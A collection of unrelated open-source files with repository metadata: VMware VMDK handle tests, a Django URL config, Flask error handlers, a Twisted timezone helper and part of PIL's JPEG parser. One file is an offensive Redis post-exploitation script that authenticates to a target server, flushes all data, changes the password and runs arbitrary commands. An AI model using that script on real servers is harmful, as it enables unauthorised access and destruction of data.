session.vim.client.options.transport.cookiejar = [vim_cookie]
return session
def test_init_failure(self):
session = self._create_mock_session(False)
self.assertRaises(exceptions.VimException,
lambda: rw_handles.VmdkWriteHandle(session,
'10.1.2.3',
'rp-1',
'folder-1',
None,
100))
def test_write(self):
session = self._create_mock_session()
handle = rw_handles.VmdkWriteHandle(session, '10.1.2.3',
'rp-1', 'folder-1', None,
100)
data = [1] * 10
handle.write(data)
self.assertEqual(len(data), handle._bytes_written)
self._conn.send.assert_called_once_with(data)
def test_update_progress(self):
vmdk_size = 100
data_size = 10
session = self._create_mock_session(True, 10)
handle = rw_handles.VmdkWriteHandle(session, '10.1.2.3',
'rp-1', 'folder-1', None,
vmdk_size)
handle.write([1] * data_size)
handle.update_progress()
def test_update_progress_with_error(self):
session = self._create_mock_session(True, 10)
handle = rw_handles.VmdkWriteHandle(session, '10.1.2.3',
'rp-1', 'folder-1', None,
100)
session.invoke_api.side_effect = exceptions.VimException(None)
self.assertRaises(exceptions.VimException, handle.update_progress)
def test_close(self):
session = self._create_mock_session()
handle = rw_handles.VmdkWriteHandle(session, '10.1.2.3',
'rp-1', 'folder-1', None,
100)
def session_invoke_api_side_effect(module, method, *args, **kwargs):
if module == vim_util and method == 'get_object_property':
return 'ready'
self.assertEqual(session.vim, module)
self.assertEqual('HttpNfcLeaseComplete', method)
session.invoke_api = mock.Mock(
side_effect=session_invoke_api_side_effect)
handle.close()
self.assertEqual(2, session.invoke_api.call_count)
class VmdkReadHandleTest(base.TestCase):
"""Tests for VmdkReadHandle."""
def setUp(self):
super(VmdkReadHandleTest, self).setUp()
req_patcher = mock.patch('urllib2.Request')
self.addCleanup(req_patcher.stop)
RequestMock = req_patcher.start()
RequestMock.return_value = mock.Mock()
urlopen_patcher = mock.patch('urllib2.urlopen')
self.addCleanup(urlopen_patcher.stop)
urlopen_mock = urlopen_patcher.start()
self._conn = mock.Mock()
urlopen_mock.return_value = self._conn
def _create_mock_session(self, disk=True, progress=-1):
device_url = mock.Mock()
device_url.disk = disk
device_url.url = 'http://*/ds/disk1.vmdk'
lease_info = mock.Mock()
lease_info.deviceUrl = [device_url]
session = mock.Mock()
def session_invoke_api_side_effect(module, method, *args, **kwargs):
if module == session.vim:
if method == 'ExportVm':
return mock.Mock()
elif method == 'HttpNfcLeaseProgress':
self.assertEqual(progress, kwargs['percent'])
return
return lease_info
session.invoke_api.side_effect = session_invoke_api_side_effect
vim_cookie = mock.Mock()
vim_cookie.name = 'name'
vim_cookie.value = 'value'
session.vim.client.options.transport.cookiejar = [vim_cookie]
return session
def test_init_failure(self):
session = self._create_mock_session(False)
self.assertRaises(exceptions.VimException,
lambda: rw_handles.VmdkReadHandle(session,
'10.1.2.3',
'vm-1',
'[ds] disk1.vmdk',
100))
def test_read(self):
chunk_size = rw_handles.READ_CHUNKSIZE
session = self._create_mock_session()
self._conn.read.return_value = [1] * chunk_size
handle = rw_handles.VmdkReadHandle(session, '10.1.2.3',
'vm-1', '[ds] disk1.vmdk',
chunk_size * 10)
handle.read(chunk_size)
self.assertEqual(chunk_size, handle._bytes_read)
self._conn.read.assert_called_once_with(chunk_size)
def test_update_progress(self):
chunk_size = rw_handles.READ_CHUNKSIZE
vmdk_size = chunk_size * 10
session = self._create_mock_session(True, 10)
self._conn.read.return_value = [1] * chunk_size
handle = rw_handles.VmdkReadHandle(session, '10.1.2.3',
'vm-1', '[ds] disk1.vmdk',
vmdk_size)
handle.read(chunk_size)
handle.update_progress()
def test_update_progress_with_error(self):
session = self._create_mock_session(True, 10)
handle = rw_handles.VmdkReadHandle(session, '10.1.2.3',
'vm-1', '[ds] disk1.vmdk',
100)
session.invoke_api.side_effect = exceptions.VimException(None)
self.assertRaises(exceptions.VimException, handle.update_progress)
def test_close(self):
session = self._create_mock_session()
handle = rw_handles.VmdkReadHandle(session, '10.1.2.3',
'vm-1', '[ds] disk1.vmdk',
100)
def session_invoke_api_side_effect(module, method, *args, **kwargs):
if module == vim_util and method == 'get_object_property':
return 'ready'
self.assertEqual(session.vim, module)
self.assertEqual('HttpNfcLeaseComplete', method)
session.invoke_api = mock.Mock(
side_effect=session_invoke_api_side_effect)
handle.close()
self.assertEqual(2, session.invoke_api.call_count)
class ImageReadHandleTest(base.TestCase):
"""Tests for ImageReadHandle."""
def test_read(self):
max_items = 10
item = [1] * 10
class ImageReadIterator:
def __init__(self):
self.num_items = 0
def __iter__(self):
return self
def next(self):
if (self.num_items < max_items):
self.num_items += 1
return item
raise StopIteration
handle = rw_handles.ImageReadHandle(ImageReadIterator())
for _ in range(0, max_items):
self.assertEqual(item, handle.read(10))
self.assertFalse(handle.read(10))
| {
"content_hash": "8e61045ba7259ed1d2b011febc02b0ab",
"timestamp": "",
"source": "github",
"line_count": 300,
"max_line_length": 78,
"avg_line_length": 38.29666666666667,
"alnum_prop": 0.5434763687004961,
"repo_name": "citrix-openstack-build/oslo.vmware",
"id": "a27f70dcb9c68fb9e84ff924554042cf5198d159",
"size": "11489",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_rw_handles.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "203261"
}
],
"symlink_target": ""
} |
"""web URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url,include
from django.contrib import admin
import blog
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^',include('blog.urls')),
]
| {
"content_hash": "35d366c1b4e8fa7d2f68c731ca788efa",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 79,
"avg_line_length": 37,
"alnum_prop": 0.6953316953316954,
"repo_name": "SnailTowardThesun/blog_django",
"id": "2990a15e263f8e733efd9cfecd2973079c3b8118",
"size": "814",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "web/web/urls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "62899"
},
{
"name": "HTML",
"bytes": "27970"
},
{
"name": "JavaScript",
"bytes": "96031"
},
{
"name": "Python",
"bytes": "9303"
}
],
"symlink_target": ""
} |
from flask import render_template, request
from standup.utils import json_requested, jsonify
def register_error_handlers(app):
app.register_error_handler(403, forbidden)
app.register_error_handler(404, page_not_found)
app.register_error_handler(500, something_broke)
def api_error(code, message):
error = dict(request=request.path, message=message)
return jsonify(error), code
def error(code, message, template):
if json_requested():
return api_error(code, str(message))
else:
return render_template(template, error=message), code
def forbidden(message=None):
message = message or 'You shall not pass!'
return error(403, message, 'errors/403.html')
def page_not_found(message=None):
message = message or 'Oops! The page you are looking for does not exist.'
return error(404, message, 'errors/404.html')
def something_broke(message=None):
message = message or 'Oops! Stood up too fast and feeling woozy.'
return error(500, message, 'errors/500.html')
class ApiError(Exception):
def __init__(self, *args, **kwargs):
super(ApiError, self).__init__(*args)
self.code = kwargs.pop('code', 400)
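# Editor-added usage sketch: wiring these handlers into a Flask app. The app
# object below is a placeholder; any Flask application works.
#
#     from flask import Flask
#     app = Flask(__name__)
#     register_error_handlers(app)
#     # 404s now render errors/404.html, or JSON when the client requests it.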
| {
"content_hash": "d92d267e45ecbbec148b97af17b76508",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 77,
"avg_line_length": 28.357142857142858,
"alnum_prop": 0.6943744752308985,
"repo_name": "rlr/standup",
"id": "97c1cf5ca07a2f21dfaf5dcf2f69c05d1ad1eb87",
"size": "1191",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "standup/errors.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "33470"
},
{
"name": "JavaScript",
"bytes": "2960"
},
{
"name": "Python",
"bytes": "149693"
},
{
"name": "Shell",
"bytes": "427"
}
],
"symlink_target": ""
} |
import sys
from redisattacks import redis_conn,redis_enum
from couchattacks import couch_conn
from termcolor import colored
#def post_couch():
def post_redis():
target=raw_input("Enter target\n")
r_server=redis_conn(target,6379)
try:
shit=r_server.keys()
except:
print colored("[+] Authentication Required \n",'red')
print colored("[+] Enter DB password to perform post attacks \n",'blue')
password=raw_input()
try:
r_server.execute_command('AUTH',password)
except Exception,e:
print colored("[+] "+str(e),'red')
sys.exit(0)
print colored("[+] Perform Post Exploitation Redis Operations \n",'green')
print colored("[+] 1)List Keys & Clients Connected \n[+] 2)Add Key \n[+] 3)Delete Keys or Flush Entire DB \n[+] 4)Change Password \n[+] 5)Execute Client commands \n",'green')
choice=input()
if choice == 1:
print colored("[+] Clients Connected %s "%(r_server.client_list()[0]['addr']))
redis_enum(r_server)
elif choice==2:
print colored("[-] Enter Key name and data",'yellow')
key=raw_input("Key\n")
data=raw_input("Data \n")
try:
r_server.set(key, data)
print colored("[-] %s:%s added"%(key,data),'blue')
except:
print colored("Error occured",'red')
elif choice == 3:
print colored("[+] a)Flush DB \n[+] b)Delete Key \n[-] Enter choice (a/b)",'blue')
ch = raw_input()
if ch == 'b':
print colored("[+] Enter the Key value to delete \n",'yellow')
key=raw_input()
if r_server.delete(key) == 1:
print colored("[+] Key %s deleted \n"%(key),'blue')
else:
print colored("[+] Key %s Doesnt Exist \n"%(key),'red')
else:
print "[+] Flushed All Database Keys \n"
r_server.flushall()
elif choice ==4:
print colored("[-] Current Password %s \n"%(r_server.config_get()['requirepass']),'green')
print colored("[+] Enter new password \n",'green')
password=raw_input()
r_server.config_set('requirepass',password)
print colored("Password Successfully set to %s"%(r_server.config_get()['requirepass']),'green')
	elif choice == 5:
		print colored("Execute client commands\n eg: FLUSHDB,ECHO,AUTH",'blue')
		command=raw_input()
		r_server.execute_command(command)
post_redis()
| {
"content_hash": "12ffc79261fec1acf747b20e67041462",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 175,
"avg_line_length": 36.355932203389834,
"alnum_prop": 0.6564102564102564,
"repo_name": "ajinabraham/Nosql-Exploitation-Framework",
"id": "976ba1f68e7e55a79a69c4354f0a9bde3db88a18",
"size": "2187",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dbattacks/postattacks.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "78243"
},
{
"name": "Shell",
"bytes": "384"
}
],
"symlink_target": ""
} |
from msrest.exceptions import (
ClientException,
SerializationError,
DeserializationError,
TokenExpiredError,
ClientRequestError,
AuthenticationError,
HttpOperationError,
)
from .api_client import AutoRestLongRunningOperationTestService, AutoRestLongRunningOperationTestServiceConfiguration
__all__ = [
'ClientException',
'SerializationError',
'DeserializationError',
'TokenExpiredError',
'ClientRequestError',
'AuthenticationError',
'HttpOperationError',
'AutoRestLongRunningOperationTestService',
'AutoRestLongRunningOperationTestServiceConfiguration'
]
| {
"content_hash": "ace0796cb775a2ae05955f1fbff08f95",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 117,
"avg_line_length": 27.043478260869566,
"alnum_prop": 0.7717041800643086,
"repo_name": "vulcansteel/autorest",
"id": "ea1145bcb5d0b5cfa7dab0f0dc81a233fd6aab4f",
"size": "1096",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "AutoRest/Generators/Python/Azure.Python.Tests/Expected/AcceptanceTests/Lro/auto_rest_long_running_operation_test_service/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "819"
},
{
"name": "C#",
"bytes": "8857811"
},
{
"name": "CSS",
"bytes": "110"
},
{
"name": "HTML",
"bytes": "274"
},
{
"name": "Java",
"bytes": "3171512"
},
{
"name": "JavaScript",
"bytes": "4063363"
},
{
"name": "PowerShell",
"bytes": "8003"
},
{
"name": "Puppet",
"bytes": "145"
},
{
"name": "Python",
"bytes": "1831874"
},
{
"name": "Ruby",
"bytes": "218212"
},
{
"name": "TypeScript",
"bytes": "158339"
}
],
"symlink_target": ""
} |
"""
Time zone utilities.
"""
from datetime import datetime, timedelta, tzinfo
__all__ = [
"FixedOffsetTimeZone",
"UTC",
]
class FixedOffsetTimeZone(tzinfo):
"""
Represents a fixed timezone offset (without daylight saving time).
@ivar name: A L{str} giving the name of this timezone; the name just
includes how much time this offset represents.
@ivar offset: A L{timedelta} giving the amount of time this timezone is
offset.
"""
def __init__(self, offset, name=None):
"""
Construct a L{FixedOffsetTimeZone} with a fixed offset.
@param offset: a delta representing the offset from UTC.
@type offset: L{timedelta}
@param name: A name to be given for this timezone.
@type name: L{str} or L{NoneType}
"""
self.offset = offset
self.name = name
@classmethod
def fromSignHoursMinutes(cls, sign, hours, minutes):
"""
Construct a L{FixedOffsetTimeZone} from an offset described by sign
('+' or '-'), hours, and minutes.
@note: For protocol compatibility with AMP, this method never uses 'Z'
@param sign: A string describing the positive or negative-ness of the
offset.
@param hours: The number of hours in the offset.
@type hours: L{int}
@param minutes: The number of minutes in the offset
@type minutes: L{int}
@return: A time zone with the given offset, and a name describing the
offset.
@rtype: L{FixedOffsetTimeZone}
"""
name = "%s%02i:%02i" % (sign, hours, minutes)
if sign == "-":
hours = -hours
minutes = -minutes
elif sign != "+":
raise ValueError("Invalid sign for timezone %r" % (sign,))
return cls(timedelta(hours=hours, minutes=minutes), name)
@classmethod
def fromLocalTimeStamp(cls, timeStamp):
"""
Create a time zone with a fixed offset corresponding to a time stamp in
the system's locally configured time zone.
@param timeStamp: a time stamp
@type timeStamp: L{int}
@return: a time zone
@rtype: L{FixedOffsetTimeZone}
"""
offset = (
datetime.fromtimestamp(timeStamp) -
datetime.utcfromtimestamp(timeStamp)
)
return cls(offset)
def utcoffset(self, dt):
"""
Return this timezone's offset from UTC.
"""
return self.offset
def dst(self, dt):
"""
Return a zero C{datetime.timedelta} for the daylight saving time
offset, since there is never one.
"""
return timedelta(0)
def tzname(self, dt):
"""
Return a string describing this timezone.
"""
if self.name is not None:
return self.name
# XXX this is wrong; the tests are
dt = datetime.fromtimestamp(0, self)
return dt.strftime("UTC%z")
UTC = FixedOffsetTimeZone.fromSignHoursMinutes("+", 0, 0)
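# Editor-added example, using only the class defined above: the same timestamp
# rendered in a fixed +05:30 offset and in UTC.
#
#     tz = FixedOffsetTimeZone.fromSignHoursMinutes("+", 5, 30)
#     datetime.fromtimestamp(0, tz).isoformat()   # '1970-01-01T05:30:00+05:30'
#     datetime.fromtimestamp(0, UTC).isoformat()  # '1970-01-01T00:00:00+00:00'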
| {
"content_hash": "35bbf76c441d9c2822f3658ce58cf453",
"timestamp": "",
"source": "github",
"line_count": 115,
"max_line_length": 79,
"avg_line_length": 26.63478260869565,
"alnum_prop": 0.5902709761671564,
"repo_name": "mollstam/UnrealPy",
"id": "614f62bf6b170623abe36b4cdbc3cb11dac5f34b",
"size": "3196",
"binary": false,
"copies": "12",
"ref": "refs/heads/master",
"path": "UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/Twisted-15.2.1/twisted/python/_tzhelper.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "APL",
"bytes": "587"
},
{
"name": "ASP",
"bytes": "2753"
},
{
"name": "ActionScript",
"bytes": "5686"
},
{
"name": "Ada",
"bytes": "94225"
},
{
"name": "Agda",
"bytes": "3154"
},
{
"name": "Alloy",
"bytes": "6579"
},
{
"name": "ApacheConf",
"bytes": "12482"
},
{
"name": "AppleScript",
"bytes": "421"
},
{
"name": "Assembly",
"bytes": "1093261"
},
{
"name": "AutoHotkey",
"bytes": "3733"
},
{
"name": "AutoIt",
"bytes": "667"
},
{
"name": "Awk",
"bytes": "63276"
},
{
"name": "Batchfile",
"bytes": "147828"
},
{
"name": "BlitzBasic",
"bytes": "185102"
},
{
"name": "BlitzMax",
"bytes": "2387"
},
{
"name": "Boo",
"bytes": "1111"
},
{
"name": "Bro",
"bytes": "7337"
},
{
"name": "C",
"bytes": "108397183"
},
{
"name": "C#",
"bytes": "156749"
},
{
"name": "C++",
"bytes": "13535833"
},
{
"name": "CLIPS",
"bytes": "6933"
},
{
"name": "CMake",
"bytes": "12441"
},
{
"name": "COBOL",
"bytes": "114812"
},
{
"name": "CSS",
"bytes": "430375"
},
{
"name": "Ceylon",
"bytes": "1387"
},
{
"name": "Chapel",
"bytes": "4366"
},
{
"name": "Cirru",
"bytes": "2574"
},
{
"name": "Clean",
"bytes": "9679"
},
{
"name": "Clojure",
"bytes": "23871"
},
{
"name": "CoffeeScript",
"bytes": "20149"
},
{
"name": "ColdFusion",
"bytes": "9006"
},
{
"name": "Common Lisp",
"bytes": "49017"
},
{
"name": "Coq",
"bytes": "66"
},
{
"name": "Cucumber",
"bytes": "390"
},
{
"name": "Cuda",
"bytes": "776"
},
{
"name": "D",
"bytes": "7556"
},
{
"name": "DIGITAL Command Language",
"bytes": "425938"
},
{
"name": "DTrace",
"bytes": "6706"
},
{
"name": "Dart",
"bytes": "591"
},
{
"name": "Dylan",
"bytes": "6343"
},
{
"name": "Ecl",
"bytes": "2599"
},
{
"name": "Eiffel",
"bytes": "2145"
},
{
"name": "Elixir",
"bytes": "4340"
},
{
"name": "Emacs Lisp",
"bytes": "18303"
},
{
"name": "Erlang",
"bytes": "5746"
},
{
"name": "F#",
"bytes": "19156"
},
{
"name": "FORTRAN",
"bytes": "38458"
},
{
"name": "Factor",
"bytes": "10194"
},
{
"name": "Fancy",
"bytes": "2581"
},
{
"name": "Fantom",
"bytes": "25331"
},
{
"name": "GAP",
"bytes": "29880"
},
{
"name": "GLSL",
"bytes": "450"
},
{
"name": "Gnuplot",
"bytes": "11501"
},
{
"name": "Go",
"bytes": "5444"
},
{
"name": "Golo",
"bytes": "1649"
},
{
"name": "Gosu",
"bytes": "2853"
},
{
"name": "Groff",
"bytes": "3458639"
},
{
"name": "Groovy",
"bytes": "2586"
},
{
"name": "HTML",
"bytes": "92126540"
},
{
"name": "Haskell",
"bytes": "49593"
},
{
"name": "Haxe",
"bytes": "16812"
},
{
"name": "Hy",
"bytes": "7237"
},
{
"name": "IDL",
"bytes": "2098"
},
{
"name": "Idris",
"bytes": "2771"
},
{
"name": "Inform 7",
"bytes": "1944"
},
{
"name": "Inno Setup",
"bytes": "18796"
},
{
"name": "Ioke",
"bytes": "469"
},
{
"name": "Isabelle",
"bytes": "21392"
},
{
"name": "Jasmin",
"bytes": "9428"
},
{
"name": "Java",
"bytes": "4040623"
},
{
"name": "JavaScript",
"bytes": "223927"
},
{
"name": "Julia",
"bytes": "27687"
},
{
"name": "KiCad",
"bytes": "475"
},
{
"name": "Kotlin",
"bytes": "971"
},
{
"name": "LSL",
"bytes": "160"
},
{
"name": "Lasso",
"bytes": "18650"
},
{
"name": "Lean",
"bytes": "6921"
},
{
"name": "Limbo",
"bytes": "9891"
},
{
"name": "Liquid",
"bytes": "862"
},
{
"name": "LiveScript",
"bytes": "972"
},
{
"name": "Logos",
"bytes": "19509"
},
{
"name": "Logtalk",
"bytes": "7260"
},
{
"name": "Lua",
"bytes": "8677"
},
{
"name": "Makefile",
"bytes": "2053844"
},
{
"name": "Mask",
"bytes": "815"
},
{
"name": "Mathematica",
"bytes": "191"
},
{
"name": "Max",
"bytes": "296"
},
{
"name": "Modelica",
"bytes": "6213"
},
{
"name": "Modula-2",
"bytes": "23838"
},
{
"name": "Module Management System",
"bytes": "14798"
},
{
"name": "Monkey",
"bytes": "2587"
},
{
"name": "Moocode",
"bytes": "3343"
},
{
"name": "MoonScript",
"bytes": "14862"
},
{
"name": "Myghty",
"bytes": "3939"
},
{
"name": "NSIS",
"bytes": "7663"
},
{
"name": "Nemerle",
"bytes": "1517"
},
{
"name": "NewLisp",
"bytes": "42726"
},
{
"name": "Nimrod",
"bytes": "37191"
},
{
"name": "Nit",
"bytes": "55581"
},
{
"name": "Nix",
"bytes": "2448"
},
{
"name": "OCaml",
"bytes": "42416"
},
{
"name": "Objective-C",
"bytes": "104883"
},
{
"name": "Objective-J",
"bytes": "15340"
},
{
"name": "Opa",
"bytes": "172"
},
{
"name": "OpenEdge ABL",
"bytes": "49943"
},
{
"name": "PAWN",
"bytes": "6555"
},
{
"name": "PHP",
"bytes": "68611"
},
{
"name": "PLSQL",
"bytes": "45772"
},
{
"name": "Pan",
"bytes": "1241"
},
{
"name": "Pascal",
"bytes": "349743"
},
{
"name": "Perl",
"bytes": "5931502"
},
{
"name": "Perl6",
"bytes": "113623"
},
{
"name": "PigLatin",
"bytes": "6657"
},
{
"name": "Pike",
"bytes": "8479"
},
{
"name": "PostScript",
"bytes": "18216"
},
{
"name": "PowerShell",
"bytes": "14236"
},
{
"name": "Prolog",
"bytes": "43750"
},
{
"name": "Protocol Buffer",
"bytes": "3401"
},
{
"name": "Puppet",
"bytes": "130"
},
{
"name": "Python",
"bytes": "122886305"
},
{
"name": "QML",
"bytes": "3912"
},
{
"name": "R",
"bytes": "49247"
},
{
"name": "Racket",
"bytes": "11341"
},
{
"name": "Rebol",
"bytes": "17708"
},
{
"name": "Red",
"bytes": "10536"
},
{
"name": "Redcode",
"bytes": "830"
},
{
"name": "Ruby",
"bytes": "91403"
},
{
"name": "Rust",
"bytes": "6788"
},
{
"name": "SAS",
"bytes": "15603"
},
{
"name": "SaltStack",
"bytes": "1040"
},
{
"name": "Scala",
"bytes": "730"
},
{
"name": "Scheme",
"bytes": "50346"
},
{
"name": "Scilab",
"bytes": "943"
},
{
"name": "Shell",
"bytes": "2925518"
},
{
"name": "ShellSession",
"bytes": "320"
},
{
"name": "Smali",
"bytes": "832"
},
{
"name": "Smalltalk",
"bytes": "158636"
},
{
"name": "Smarty",
"bytes": "523"
},
{
"name": "SourcePawn",
"bytes": "130"
},
{
"name": "Standard ML",
"bytes": "36869"
},
{
"name": "Swift",
"bytes": "2035"
},
{
"name": "SystemVerilog",
"bytes": "265"
},
{
"name": "Tcl",
"bytes": "6077233"
},
{
"name": "TeX",
"bytes": "487999"
},
{
"name": "Tea",
"bytes": "391"
},
{
"name": "TypeScript",
"bytes": "535"
},
{
"name": "VHDL",
"bytes": "4446"
},
{
"name": "VimL",
"bytes": "32053"
},
{
"name": "Visual Basic",
"bytes": "19441"
},
{
"name": "XQuery",
"bytes": "4289"
},
{
"name": "XS",
"bytes": "178055"
},
{
"name": "XSLT",
"bytes": "1995174"
},
{
"name": "Xtend",
"bytes": "727"
},
{
"name": "Yacc",
"bytes": "25665"
},
{
"name": "Zephir",
"bytes": "485"
},
{
"name": "eC",
"bytes": "31545"
},
{
"name": "mupad",
"bytes": "2442"
},
{
"name": "nesC",
"bytes": "23697"
},
{
"name": "xBase",
"bytes": "3349"
}
],
"symlink_target": ""
} |
import array
import struct
import io
import warnings
from struct import unpack_from
from PIL import Image, ImageFile, TiffImagePlugin, _binary
from PIL.JpegPresets import presets
from PIL._util import isStringType
i8 = _binary.i8
o8 = _binary.o8
i16 = _binary.i16be
i32 = _binary.i32be
__version__ = "0.6"
#
# Parser
def Skip(self, marker):
n = i16(self.fp.read(2))-2
ImageFile._safe_read(self.fp, n)
def APP(self, marker):
#
# Application marker. Store these in the APP dictionary.
# Also look for well-known application markers.
n = i16(self.fp.read(2))-2
s = ImageFile._safe_read(self.fp, n)
app = "APP%d" % (marker & 15)
self.app[app] = s # compatibility
self.applist.append((app, s))
if marker == 0xFFE0 and s[:4] == b"JFIF":
# extract JFIF information
self.info["jfif"] = version = i16(s, 5) # version
self.info["jfif_version"] = divmod(version, 256)
# extract JFIF properties
try:
jfif_unit = i8(s[7])
jfif_density = i16(s, 8), i16(s, 10)
except:
pass
else:
if jfif_unit == 1:
self.info["dpi"] = jfif_density
self.info["jfif_unit"] = jfif_unit
self.info["jfif_density"] = jfif_density
elif marker == 0xFFE1 and s[:5] == b"Exif\0":
# extract Exif information (incomplete)
self.info["exif"] = s # FIXME: value will change
elif marker == 0xFFE2 and s[:5] == b"FPXR\0":
# extract FlashPix information (incomplete)
self.info["flashpix"] = s # FIXME: value will change
elif marker == 0xFFE2 and s[:12] == b"ICC_PROFILE\0":
# Since an ICC profile can be larger than the maximum size of
# a JPEG marker (64K), we need provisions to split it into
# multiple markers. The format defined by the ICC specifies
# one or more APP2 markers containing the following data:
# Identifying string ASCII "ICC_PROFILE\0" (12 bytes)
# Marker sequence number 1, 2, etc (1 byte)
# Number of markers Total of APP2's used (1 byte)
# Profile data (remainder of APP2 data)
# Decoders should use the marker sequence numbers to
# reassemble the profile, rather than assuming that the APP2
# markers appear in the correct sequence.
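        # (Editor-added illustration) A ~100 KB profile split over two APP2
        # markers would arrive as payloads shaped like:
        #   b"ICC_PROFILE\0" + b"\x01" + b"\x02" + <first 65519 profile bytes>
        #   b"ICC_PROFILE\0" + b"\x02" + b"\x02" + <remaining profile bytes>
        # `s` below is one such payload; SOF() sorts and reassembles them.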
self.icclist.append(s)
elif marker == 0xFFEE and s[:5] == b"Adobe":
self.info["adobe"] = i16(s, 5)
# extract Adobe custom properties
try:
adobe_transform = i8(s[1])
except:
pass
else:
self.info["adobe_transform"] = adobe_transform
elif marker == 0xFFE2 and s[:4] == b"MPF\0":
# extract MPO information
self.info["mp"] = s[4:]
# offset is current location minus buffer size
# plus constant header size
self.info["mpoffset"] = self.fp.tell() - n + 4
def COM(self, marker):
#
# Comment marker. Store these in the APP dictionary.
n = i16(self.fp.read(2))-2
s = ImageFile._safe_read(self.fp, n)
self.app["COM"] = s # compatibility
self.applist.append(("COM", s))
def SOF(self, marker):
#
# Start of frame marker. Defines the size and mode of the
# image. JPEG is colour blind, so we use some simple
# heuristics to map the number of layers to an appropriate
# mode. Note that this could be made a bit brighter, by
# looking for JFIF and Adobe APP markers.
n = i16(self.fp.read(2))-2
s = ImageFile._safe_read(self.fp, n)
self.size = i16(s[3:]), i16(s[1:])
self.bits = i8(s[0])
if self.bits != 8:
raise SyntaxError("cannot handle %d-bit layers" % self.bits)
self.layers = i8(s[5])
if self.layers == 1:
self.mode = "L"
elif self.layers == 3:
self.mode = "RGB"
elif self.layers == 4:
self.mode = "CMYK"
else:
raise SyntaxError("cannot handle %d-layer images" % self.layers)
if marker in [0xFFC2, 0xFFC6, 0xFFCA, 0xFFCE]:
self.info["progressive"] = self.info["progression"] = 1
if self.icclist:
# fixup icc profile
self.icclist.sort() # sort by sequence number
if i8(self.icclist[0][13]) == len(self.icclist):
profile = []
for p in self.icclist:
profile.append(p[14:])
icc_profile = b"".join(profile)
else:
icc_profile = None # wrong number of fragments
self.info["icc_profile"] = icc_profile
self.icclist = None
for i in range(6, len(s), 3):
t = s[i:i+3]
# 4-tuples: id, vsamp, hsamp, qtable
self.layer.append((t[0], i8(t[1])//16, i8(t[1]) & 15, i8(t[2])))
def DQT(self, marker):
#
# Define quantization table. Support baseline 8-bit tables
# only. Note that there might be more than one table in
# each marker.
# FIXME: The quantization tables can be used to estimate the
# compression quality.
n = i16(self.fp.read(2))-2
s = ImageFile._safe_read(self.fp, n)
while len(s):
if len(s) < 65:
raise SyntaxError("bad quantization table marker")
v = i8(s[0])
if v//16 == 0:
self.quantization[v & 15] = array.array("B", s[1:65])
s = s[65:]
else:
return # FIXME: add code to read 16-bit tables!
# raise SyntaxError, "bad quantization table element size"
#
# JPEG marker table
MARKER = {
0xFFC0: ("SOF0", "Baseline DCT", SOF),
0xFFC1: ("SOF1", "Extended Sequential DCT", SOF),
0xFFC2: ("SOF2", "Progressive DCT", SOF),
0xFFC3: ("SOF3", "Spatial lossless", SOF),
0xFFC4: ("DHT", "Define Huffman table", Skip),
0xFFC5: ("SOF5", "Differential sequential DCT", SOF),
0xFFC6: ("SOF6", "Differential progressive DCT", SOF),
0xFFC7: ("SOF7", "Differential spatial", SOF),
0xFFC8: ("JPG", "Extension", None),
0xFFC9: ("SOF9", "Extended sequential DCT (AC)", SOF),
0xFFCA: ("SOF10", "Progressive DCT (AC)", SOF),
0xFFCB: ("SOF11", "Spatial lossless DCT (AC)", SOF),
0xFFCC: ("DAC", "Define arithmetic coding conditioning", Skip),
0xFFCD: ("SOF13", "Differential sequential DCT (AC)", SOF),
0xFFCE: ("SOF14", "Differential progressive DCT (AC)", SOF),
0xFFCF: ("SOF15", "Differential spatial (AC)", SOF),
0xFFD0: ("RST0", "Restart 0", None),
0xFFD1: ("RST1", "Restart 1", None),
0xFFD2: ("RST2", "Restart 2", None),
0xFFD3: ("RST3", "Restart 3", None),
0xFFD4: ("RST4", "Restart 4", None),
0xFFD5: ("RST5", "Restart 5", None),
0xFFD6: ("RST6", "Restart 6", None),
0xFFD7: ("RST7", "Restart 7", None),
0xFFD8: ("SOI", "Start of image", None),
0xFFD9: ("EOI", "End of image", None),
0xFFDA: ("SOS", "Start of scan", Skip),
0xFFDB: ("DQT", "Define quantization table", DQT),
0xFFDC: ("DNL", "Define number of lines", Skip),
0xFFDD: ("DRI", "Define restart interval", Skip),
0xFFDE: ("DHP", "Define hierarchical progression", SOF),
0xFFDF: ("EXP", "Expand reference component", Skip),
0xFFE0: ("APP0", "Application segment 0", APP),
0xFFE1: ("APP1", "Application segment 1", APP),
0xFFE2: ("APP2", "Application segment 2", APP),
0xFFE3: ("APP3", "Application segment 3", APP),
0xFFE4: ("APP4", "Application segment 4", APP),
0xFFE5: ("APP5", "Application segment 5", APP),
0xFFE6: ("APP6", "Application segment 6", APP),
0xFFE7: ("APP7", "Application segment 7", APP),
0xFFE8: ("APP8", "Application segment 8", APP),
0xFFE9: ("APP9", "Application segment 9", APP),
0xFFEA: ("APP10", "Application segment 10", APP),
0xFFEB: ("APP11", "Application segment 11", APP),
